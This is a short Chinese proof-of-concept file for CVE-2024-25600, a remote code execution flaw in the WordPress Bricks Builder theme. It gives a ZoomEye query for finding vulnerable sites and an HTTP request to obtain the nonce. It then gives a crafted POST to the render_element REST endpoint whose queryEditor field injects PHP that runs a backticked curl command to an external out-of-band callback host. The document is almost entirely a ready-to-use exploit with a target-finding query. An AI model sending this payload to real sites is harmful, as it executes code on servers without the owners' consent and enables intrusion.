WordPress插件Bricks Builder存在RCE漏洞(CVE-2024-25600).md

WordPress插件Bricks Builder存在RCE漏洞(CVE-2024-25600)

zoomeye

web.body="/wp-content/themes/bricks/"

poc

获取nonce值

GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:96.0) Gecko/20100101 Firefox/96.0
Connection: close
Accept-Encoding: gzip, deflate

rce

POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
Connection: close
Content-Length: 401
Content-Type: application/json
Accept-Encoding: gzip, deflate

{
  "postId": "1",
  "nonce": "c5b5949**",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `curl cnc4ej5blq62an78ck6giyhcffmdr5t56.oast.pro`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

漏洞分析

• https://xz.aliyun.com/t/13833